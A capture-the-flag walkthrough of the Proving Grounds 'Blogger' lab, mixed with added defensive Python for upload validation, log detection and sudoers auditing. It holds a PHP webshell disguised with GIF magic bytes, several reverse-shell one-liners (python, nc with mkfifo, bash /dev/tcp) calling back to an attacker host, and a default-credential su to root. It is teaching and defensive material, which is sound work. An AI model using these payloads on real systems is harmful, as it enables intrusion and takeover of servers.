Blogger - Proving Grounds

Enumeration

Let's enumerate all the TCP ports with nmap.
nmap -sCV -p- --min-rate 1000 -v 192.168.171.217
I have SSH (port 22) and Apache (port 80), so let's enumerate Apache.

Apache - port 80

http://192.168.171.217
I see a Blogger site with some fields on the page and the name James.
Let's try to find out some hidden subdirectories with gobuster.

Find subdirectories - Gobuster

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://192.168.171.217 -x zip,php -b 404,403
I will try to access the /assets subdirectory.
http://192.168.171.217/assets/fonts/blog/
Seems like there is no CSS, so let's add the target IP to /etc/hosts.
echo '192.168.171.217 blogger.pg' | sudo tee -a /etc/hosts
http://blogger.pg/assets/fonts/blog/
Let's enumerate subdirectories while I search for more information.
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://blogger.pg/assets/fonts/blog/ -x zip,php -b 404,403
I went to the /wp-admin subdirectory and tried to log in with default users, and with the users I found, using default passwords, but without success.

Foothold

While searching I found a link titled HelloWorld! that shows a file upload option, so I can upload a reverse shell or a webshell.
http://blogger.pg/assets/fonts/blog/?p=1#comment-1

Webshell with GIF Magic Bytes

Let's create a webshell and upload it.
nano webshell.php

<?system($_GET['cmd']);?>

I can't upload it because only image types are accepted, so let's add GIF magic bytes to the webshell.
nano webshell.php

GIF89a;
<?system($_GET['cmd']);?>

It uploads but doesn't work, so let's change the webshell to <?php echo shell_exec($_GET['cmd']); ?> and test it this time.
nano webshell.php

GIF89a;
<?php echo shell_exec($_GET['cmd']); ?>

Now let's execute the command id.
http://blogger.pg/assets/fonts/blog/wp-content/uploads/2024/10/webshell-1728382922.0066.php?cmd=id
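The upload check bypassed above only looks at the first bytes of the file, so a GIF header followed by PHP passes. As an added example (not code from the walkthrough or from WordPress), here is a stricter server-side validator in Python: it allow-lists the final extension, requires the signature that matches the claimed type, scans the whole body for a PHP open tag, and never keeps the client's filename. The IMAGE_SIGNATURES table, the sample bytes and the function names are this example's own; WEBSHELL reproduces the walkthrough's payload as the rejected input.

```python
import os
import re
import secrets

# Allowed image extensions and the signature bytes each must start with.
# (Example table; a production validator would additionally decode the image.)
IMAGE_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Any PHP open tag in the body ("<?", "<?php", "<?=").  Rejecting the bare
# sequence can occasionally hit a genuine JPEG by chance; for uploads that is
# an acceptable false positive (the user re-encodes the image).
PHP_OPEN_TAG = re.compile(rb"<\?")


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a candidate image upload."""
    # 1. Allow-list on the final extension only.
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension '{ext}' not allowed"
    # 2. Signature must match the type the extension claims, not just "some image".
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "content does not match claimed image type"
    # 3. Inspect the whole body: a GIF header followed by PHP is the bypass used above.
    if PHP_OPEN_TAG.search(data):
        return False, "embedded PHP open tag"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Never keep the client's filename: random name plus the validated extension."""
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed samples: the walkthrough's polyglot payload, and a genuine 1x1 GIF.
WEBSHELL = b"GIF89a;\n<?php echo shell_exec($_GET['cmd']); ?>\n"
TINY_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
    b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)

if __name__ == "__main__":
    for name, body in [("webshell.php", WEBSHELL), ("webshell.gif", WEBSHELL),
                       ("pixel.gif", TINY_GIF), ("pixel.png", TINY_GIF)]:
        print(name, validate_upload(name, body))
    print("would store as", stored_name("gif"))
```

Even with this validator in place, the uploads directory should be served with PHP execution disabled, so that a file which slips through is returned as data rather than run.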

Execute Reverse Shell from WebShell - Linux

Let's run a python3 reverse shell through the webshell to get a connection back to the listener on my local machine.
nc -lvnp 4444
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.210",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
or
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.210 4444>/tmp/f
or
bash -c 'bash -i >& /dev/tcp/192.168.45.210/4444 0>&1'
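Both the id command and the reverse shell above arrive at the server as ordinary GET requests to a .php file inside wp-content/uploads, which is something an access log review can catch. The following is an added example (not part of the walkthrough) of that detection logic in Python, run over constructed Apache combined-format log lines that mirror this box's subdirectory install; the IPs and timestamps are made up, and LOG_RE, scan_access_log and SCRIPT_EXTS are this example's own names.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: request line, status, bytes, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOADS_DIR = "/wp-content/uploads/"
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")

# Constructed log lines modelled on this walkthrough (WordPress installed under
# /assets/fonts/blog/).  Line 1 is a normal comment post, line 2 a normal image fetch.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2024:11:12:40 +0000] "POST /assets/fonts/blog/wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [08/Oct/2024:11:20:10 +0000] "GET /assets/fonts/blog/wp-content/uploads/2024/10/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Oct/2024:11:24:02 +0000] "GET /assets/fonts/blog/wp-content/uploads/2024/10/webshell-1728382922.0066.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Oct/2024:11:24:48 +0000] "GET /assets/fonts/blog/wp-content/uploads/2024/10/webshell-1728382922.0066.php?cmd=ls+-la HTTP/1.1" 200 612 "-" "curl/8.0"
"""


def scan_access_log(text: str) -> list[dict]:
    """One finding per request that fetches a script from the uploads tree
    or passes a 'cmd' parameter to anything under it."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would count these
        url = urlsplit(m["target"])
        if UPLOADS_DIR not in url.path:
            continue
        reasons = []
        if url.path.lower().endswith(SCRIPT_EXTS):
            reasons.append("script requested from uploads directory")
        if "cmd" in parse_qs(url.query):
            reasons.append("cmd parameter")
        if reasons:
            findings.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": url.path,
                # 200 here means the server ran (or at least served) the script
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["status"], f["path"], "|", "; ".join(f["reasons"]))
```

The first rule alone (any script extension under uploads) is the one worth alerting on: there is no legitimate reason for a WordPress uploads path to be executed, and a 200 on such a request means the hardening step of disabling PHP in that directory is missing.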

Privilege Escalation

First let's upgrade to a TTY shell.
python3 -c 'import pty;pty.spawn("/bin/bash");'
I got the user flag in the /home/james directory.
cd /home/james
ls -la

Linpeas

Let's transfer linpeas.sh to the target machine and run it.
python3 -m http.server 80
wget http://192.168.45.210/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
I checked the SUID binaries but there was nothing interesting.

Unexpected Moment - Change Users

Before we try to access the MySQL server, let's just try switching to james, ubuntu and vagrant.
su james
james
su ubuntu
ubuntu
su vagrant
vagrant
The vagrant default credentials worked.

.bash_history

Let's see what commands are in this file.
cat .bash_history
I see that this user runs an su command to get a root shell, so I checked the sudo commands and saw that I can run them all.
sudo -l
sudo su -
id
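The root shell here comes from two configuration choices rather than a software bug: an account whose password equals its username, and a sudoers entry granting that account every command. The following is an added example (not from the walkthrough) of how an administrator would audit sudoers for the second condition in Python: it parses user specifications, strips NOPASSWD-style tags, and flags any grant of ALL. SAMPLE_SUDOERS is constructed for this example and is not taken from the target; the vagrant line is the form Vagrant base boxes commonly ship with, which is an assumption here.

```python
import re

# One user specification per line:  who  host=(runas[:rungroup]) [TAG:]... commands
SPEC_RE = re.compile(
    r"^(?P<who>[^\s#]+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$"
)
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|LOG_OUTPUT)\s*:\s*"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias",
                 "Cmnd_Alias", "@include")

# Constructed sudoers content for this example (not the target's file).
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
vagrant ALL=(ALL) NOPASSWD:ALL
james   ALL=(root) /usr/bin/systemctl restart apache2
"""


def parse_sudoers(text: str) -> list[dict]:
    """Return the user specifications found in sudoers text (aliases, Defaults
    and comments are skipped; alias expansion is out of scope for this example)."""
    specs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        rest, tags = m["rest"], []
        while (t := TAG_RE.match(rest)):  # peel off NOPASSWD: and friends
            tags.append(t.group(1))
            rest = rest[t.end():]
        specs.append({
            "who": m["who"],
            "host": m["host"],
            "runas": m["runas"] or "root",   # sudo's default target user
            "nopasswd": "NOPASSWD" in tags,
            "commands": [c.strip() for c in rest.split(",")],
        })
    return specs


def audit_sudoers(text: str, ignore=("root",)) -> list[dict]:
    """Flag every spec that grants ALL commands, and any spec carrying NOPASSWD."""
    flagged = []
    for spec in parse_sudoers(text):
        if spec["who"] in ignore:
            continue
        unrestricted = "ALL" in spec["commands"]
        if unrestricted or spec["nopasswd"]:
            flagged.append({**spec, "unrestricted": unrestricted})
    return flagged


if __name__ == "__main__":
    for s in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if s["nopasswd"] else ""
        print(f'{s["who"]:10} runas={s["runas"]:8} {tag}{",".join(s["commands"])}')
```

Run against a real host you would feed it the output of visudo -c -f for each file under /etc/sudoers.d as well; a hit on a service or provisioning account (vagrant here) is the one that matters, since its password is frequently a known default.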
Let's get the root flag.
ls